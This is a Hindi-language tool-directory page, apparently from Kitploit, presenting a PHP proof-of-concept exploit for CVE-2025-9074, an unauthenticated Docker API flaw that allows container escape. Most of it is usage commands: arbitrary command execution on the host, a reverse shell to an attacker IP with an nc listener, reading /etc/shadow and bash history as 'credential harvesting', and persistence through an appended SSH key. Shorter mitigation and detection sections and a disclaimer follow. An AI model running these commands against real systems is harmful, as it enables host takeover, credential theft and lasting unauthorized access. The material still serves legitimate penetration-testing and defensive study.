Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/c0gnit00/cve-2025-9074
विशेषाधिकार वृद्धिपेलोड जनरेशनभेद्यता विश्लेषणशोषणपार्श्व आंदोलनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षाकमांड एंड कंट्रोलरिमोट एक्सेस टूलकंटेनर एस्केप
53 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
c0gnit00/cve-2025-9074

CVE-2025-9074

PHP poc, CVE-2025-9074 के लिए शोषण

रिपॉजिटरी देखें

CVE-2025-9074: डॉकर इंजन API अनधिकृत RCE

गंभीरता: गंभीर | CVSS स्कोर: 9.8 (अनुमानित) | प्रभावित संस्करण: Docker Desktop < 4.44.3

CVE-2025-9074 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो डॉकर इंजन API में एक अनधिकृत रिमोट कोड निष्पादन (RCE) भेद्यता है जो विशेषाधिकार प्राप्त कंटेनर एस्केप और होस्ट सिस्टम से समझौता करने की अनुमति देता है।

🔴 भेद्यता अवलोकन

CVE-2025-9074 डॉकर डेस्कटॉप में एक गंभीर भेद्यता है जो उचित प्रमाणीकरण या नेटवर्क अलगाव के बिना डॉकर इंजन API को उजागर करती है। यह दूरस्थ हमलावरों को अनुमति देता है:

  • उन्नत विशेषाधिकारों के साथ मनमाने आदेश निष्पादित करें
  • कंटेनर अलगाव से बचकर होस्ट फाइलसिस्टम तक पहुंचें
  • हमलावर-नियंत्रित सिस्टम पर रिवर्स शेल कनेक्शन स्थापित करें
  • संपूर्ण कंटेनर होस्ट और अंतर्निहित होस्ट OS से समझौता करें

हमला वेक्टर

  • नेटवर्क एक्सपोजर: डॉकर API नेटवर्क इंटरफेस पर उजागर (आमतौर पर पोर्ट 2375/TCP)
  • कोई प्रमाणीकरण नहीं: API बिना प्रमाणीकरण के अनुरोध स्वीकार करता है
  • विशेषाधिकार प्राप्त कंटेनर: होस्ट फाइलसिस्टम एक्सेस के साथ विशेषाधिकार प्राप्त कंटेनर बनाने की क्षमता
  • बाइंड माउंट: बाइंड माउंट पथों के माध्यम से होस्ट फाइलसिस्टम तक सीधी पहुंच

📋 आवश्यकताएँ

  • PHP CLI (7.0+)
  • PHP में curl एक्सटेंशन सक्षम
  • उजागर Docker API एंडपॉइंट के लिए नेटवर्क कनेक्टिविटी
  • Docker Desktop < 4.44.3 (भेद्य संस्करण)

लक्ष्य के लिए सिस्टम आवश्यकताएँ

भेद्यता प्रभावित करती है:

  • Docker Desktop for Windows < 4.44.3
  • Docker Desktop for Mac < 4.44.3
  • Docker Engine (जब TLS के बिना उजागर)

🚀 त्वरित प्रारंभ

स्थापना

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-9074.git
cd CVE-2025-9074

मूल उपयोग

Docker होस्ट पर एक एकल कमांड निष्पादित करें:

root@kitploit:~
php poc.php -u http://192.168.65.7:2375 -m cmd -c "whoami"

रिवर्स शेल

एक इंटरैक्टिव रिवर्स शेल स्थापित करें:

root@kitploit:~
# Terminal 1: Start listener
nc -lvnp 4444

# Terminal 2: Run exploit
php poc.php -u http://192.168.65.7:2375 -m reverse -l 10.10.14.36 -p 4444

📖 उपयोग गाइड

कमांड सिंटैक्स

root@kitploit:~
php poc.php -u <url> [options]

विकल्प

मोड: कमांड निष्पादन

लक्ष्य पर एकल कमांड निष्पादित करें:

root@kitploit:~
# Simple command
php poc.php -u http://192.168.65.7:2375 -m cmd -c "id"

# Read files from host
php poc.php -u http://192.168.65.7:2375 -m cmd -c "cat /mnt/hostfs/flag.txt" --cleanup

# With cleanup
php poc.php -u http://192.168.65.7:2375 -m cmd -c "whoami" --cleanup

मोड: रिवर्स शेल

कॉलबैक के साथ एक इंटरैक्टिव शेल स्पॉन करें:

root@kitploit:~
php poc.php -u http://192.168.65.7:2375 -m reverse -l 192.168.1.100 -p 4444

OS-विशिष्ट उदाहरण

Linux लक्ष्य

root@kitploit:~
php poc.php -u http://target:2375 -m cmd -c "cat /mnt/hostfs/etc/shadow" --os linux

Windows लक्ष्य

root@kitploit:~
php poc.php -u http://target:2375 -m cmd -c "dir C:\" --os windows

macOS लक्ष्य

root@kitploit:~
php poc.php -u http://target:2375 -m cmd -c "ls -la /mnt/hostfs/Users/" --os mac

🎯 वास्तविक दुनिया के शोषण परिदृश्य

1. टोही

root@kitploit:~
# Enumerate host system
php poc.php -u http://192.168.65.7:2375 -m cmd -c "uname -a"
php poc.php -u http://192.168.65.7:2375 -m cmd -c "whoami"

2. क्रेडेंशियल हार्वेस्टिंग

root@kitploit:~
# Extract sensitive files
php poc.php -u http://192.168.65.7:2375 -m cmd -c "cat /mnt/hostfs/root/.bash_history"
php poc.php -u http://192.168.65.7:2375 -m cmd -c "cat /mnt/hostfs/etc/passwd"

3. स्थायित्व

root@kitploit:~
# Add SSH key
php poc.php -u http://192.168.65.7:2375 -m cmd -c "mkdir -p /mnt/hostfs/root/.ssh && echo 'SSH_KEY' >> /mnt/hostfs/root/.ssh/authorized_keys"

4. पार्श्व गति

root@kitploit:~
# Enumerate running containers and networks
php poc.php -u http://192.168.65.7:2375 -m cmd -c "docker ps --all"

🔍 तकनीकी विवरण

भेद्यता तंत्र

  1. एक्सपोज़्ड डॉकर सॉकेट/API: डॉकर API बिना प्रमाणीकरण के 0.0.0.0:2375 पर सुनता है
  2. विशेषाधिकार प्राप्त कंटेनर निर्माण: POC /containers/create के माध्यम से विशेषाधिकार प्राप्त कंटेनर बनाता है
  3. होस्ट फाइलसिस्टम बाइंडिंग: कंटेनर होस्ट फाइलसिस्टम तक पहुंचने के लिए बाइंड माउंट का उपयोग करते हैं:
    • Linux: :/mnt/hostfs
    • macOS: :/mnt/hostfs
    • Windows: /mnt/host/c:/mnt/hostfs
  4. कमांड निष्पादन: कंटेनर के अंदर root/SYSTEM विशेषाधिकारों के साथ कमांड निष्पादित होते हैं
  5. होस्ट फाइलसिस्टम एक्सेस: /mnt/hostfs पथों तक सीधी पढ़ने/लिखने की पहुंच

पेलोड प्रवाह

root@kitploit:~
┌─────────────────────────────────────────────────────┐
│ poc.php (Your Machine)                               │
└────────────┬────────────────────────────────────────┘
             │ HTTP REST API Call
             ▼
┌─────────────────────────────────────────────────────┐
│ Docker API (Target Port 2375) [UNAUTHENTICATED]     │
└────────────┬────────────────────────────────────────┘
             │ Creates Container
             ▼
┌─────────────────────────────────────────────────────┐
│ Privileged Alpine Container                          │
│ ├─ Full Root Access                                 │
│ ├─ Bind Mount: /:/mnt/hostfs                       │
│ └─ Executes Attacker Command                        │
└────────────┬────────────────────────────────────────┘
             │ Command Output
             ▼
┌─────────────────────────────────────────────────────┐
│ Output Returned to Attacker                          │
└─────────────────────────────────────────────────────┘

कोड विश्लेषण

  • Docker API इंटरैक्शन: HTTP/1.1 REST API संचार के लिए cURL का उपयोग करता है
  • Docker Log Demuxing: Docker के मल्टीप्लेक्स्ड स्ट्रीम प्रारूप को ठीक से संभालता है
  • क्रॉस-प्लेटफ़ॉर्म समर्थन: Windows/Mac/Linux के लिए बाइंड माउंट पथों को अनुकूलित करता है
  • टाइमआउट हैंडलिंग: लंबे समय तक चलने वाले कमांड के लिए 60-सेकंड का टाइमआउट

🛡️ शमन

तत्काल कार्रवाई

  1. Docker Desktop अपग्रेड करें

    root@kitploit:~
    # Update to version 4.44.3 or later
    
  2. नेटवर्क अलगाव

    • Docker API पोर्ट (2375) को केवल localhost तक सीमित करें
    • बाहरी पहुंच को अवरुद्ध करने के लिए फ़ायरवॉल नियमों का उपयोग करें
    • Docker API सॉकेट एक्सपोज़र को अक्षम करें
  3. TLS प्रमाणीकरण सक्षम करें

    root@kitploit:~
    # Configure Docker daemon with TLS certificates
    # In daemon.json:
    {
      "tlsverify": true,
      "tlscacert": "/etc/docker/ca.pem",
      "tlscert": "/etc/docker/server-cert.pem",
      "tlskey": "/etc/docker/server-key.pem"
    }
    
  4. नेटवर्क विभाजन

    • पृथक नेटवर्क पर Docker Desktop चलाएं
    • ज़ीरो-ट्रस्ट नेटवर्क एक्सेस लागू करें
    • दूरस्थ पहुंच के लिए VPN का उपयोग करें

Docker Desktop सेटिंग्स

  • Windows/Mac: "Expose daemon on tcp://localhost:2375" को अक्षम करें
  • केवल स्थानीय पहुंच के लिए Unix सॉकेट (/var/run/docker.sock) का उपयोग करें
  • क्रेडेंशियल के साथ Docker Context के माध्यम से प्रमाणीकरण लागू करें

📊 पहचान

नेटवर्क पहचान

root@kitploit:~
# Scan for exposed Docker APIs
nmap -p 2375,2376 -sV target_network

# Check if port responds to Docker API
curl -s http://target:2375/version

लॉग पहचान

  • असामान्य API कॉल के लिए Docker डेमॉन लॉग की निगरानी करें
  • विशेषाधिकार प्राप्त कंटेनर निर्माण पर सतर्क करें
  • बाइंड माउंट उपयोग पैटर्न ट्रैक करें

⚠️ अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।

  • इस POC का उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है
  • कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है
  • उपयोगकर्ता अपने कार्यों की पूरी जिम्मेदारी लेते हैं
  • यह POC अधिकृत पेनिट्रेशन टेस्टिंग और भेद्यता अनुसंधान के लिए है

📝 संदर्भ

  • डॉकर इंजन सुरक्षा
  • डॉकर API दस्तावेज़ीकरण
  • CVE-2025-9074 विवरण
  • CWE-784: उचित सत्यापन के बिना कुकीज़ पर निर्भरता

🤝 योगदान

योगदान का स्वागत है! कृपया बेझिझक issues या pull requests सबमिट करें।

📄 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

👤 लेखक

सुरक्षा शोधकर्ता | पेनिट्रेशन टेस्टर


अंतिम अद्यतन: मई 2025 | स्थिति: सक्रिय अनुसंधान

टूल डाउनलोड करें
OptionShortRequiredDescription
--url-u✅ हाँDocker API URL (जैसे, http://1.2.3.4:2375)
--mode-m❌ नहींनिष्पादन मोड: cmd या reverse (डिफ़ॉल्ट: cmd)
--cmd-c⚠️ cmd मोड के लिएलक्ष्य पर निष्पादित करने का कमांड
--lhost-l⚠️ reverse मोड के लिएकॉलबैक के लिए आपका IP पता
--lport-p❌ नहींआपका सुनने वाला पोर्ट (डिफ़ॉल्ट: 4444)
--os—❌ नहींलक्ष्य OS: linux, mac, windows (डिफ़ॉल्ट: linux)
--cleanup—❌ नहींनिष्पादन के बाद कंटेनर हटाएं
--help-h❌ नहींसहायता संदेश प्रदर्शित करें